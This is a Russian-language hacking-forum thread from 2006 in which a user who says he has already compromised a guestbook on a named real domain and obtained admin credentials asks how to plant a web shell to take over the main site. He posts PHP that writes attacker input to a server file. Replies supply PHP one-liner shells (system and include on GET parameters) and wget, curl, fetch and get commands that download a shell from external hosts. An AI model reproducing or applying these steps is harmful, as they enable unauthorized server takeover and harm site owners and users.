HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ПРОГРАММИРОВАНИЕ > PHP
Перезагрузить страницу Взломать весь сайт через отдельный поддомен
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Взломать весь сайт через отдельный поддомен
  #1  
Старый 31.01.2006, 20:56
Monah IRH
Новичок
Регистрация: 17.08.2005
Сообщений: 1
С нами: 10911916

Репутация: 0
По умолчанию Взломать весь сайт через отдельный поддомен
Код:
<?
$open = fopen("/usr/local/psa/home/vhosts/sbmx.com.ru/subdomains/guest/httpdocs/script.php","w+");
	fwrite ($open,$_GET['fp']."\\n");
	fclose($open);
?>
Взломал Sad Raven GuestBook.
Получил пароль и логин админа.

Есть такая уязвимость там, что в дизайне сайта могут содержаться php-скрипты. Информация с http://xop0k.h15.ru/adv/3.txt

В общем пробовал загрузить туда маленький свой скриптик, который содержит форму загрузки файлов в себе.
Передаю то, что надо записывать через GET переменную fp.

Все бы было ок, да эта гостевуха экранирует слеши вот такие:
Код:
\
Как следствие нельзя записать в текстовой файл переменные в таком виде:
Код:
fwrite($fp, "\$text=\$_GET['fp']");
и это проблема. Не знаю как решить. Причем поставив один слеш при каждом сохранении они увеличиваются в геометрической прогрессии )

Вот думаю как ещё можно загрузить файлик со своего компа на сервер. Загрузить хочу шелл, чтобы получить доступ ко всему сайту, т.к. гостевуха нахзодится на отдельном домене guest.site.ru, а сайт находится на site.ru

Абсолютные пути известны
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 31.01.2006, 21:19
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
С нами: 10937126

Репутация: 1316


По умолчанию
пишешь
`wget http://kobeluga.narod.ru/rst.php`;
и у тебя загрузиться шелл в папку с гуестой =)
по идее не должны `` экранироваться
 
Ответить с цитированием

  #3  
Старый 01.02.2006, 03:10
grinay
IQ- 137%
Регистрация: 15.06.2004
Сообщений: 441
С нами: 11527586

Репутация: 662
По умолчанию
Если у тебя есть возможность создать файл тогда пиши <?php system($_GET[cmd]);?>
или <?php include($_GET[open]);?>
В первом случае у тебя уже шелл во втором ты его можеш проинклудить и после выполнить то что сказал киборг если же это фря в гета там может и не быть тогда
fetch -o shell.php http://freeshell.ru/myshell.txt курл и гет
curl -o shell.php http://freeshell.ru/myshell.txt
get -o shell.php http://freeshell.ru/myshell.txt
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Могу взломать сайт, чат, мыло форум, вообщем все что ломается!!!За $$$ Макс307 Болталка 19 17.12.2005 20:00



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка

Загрузка чата...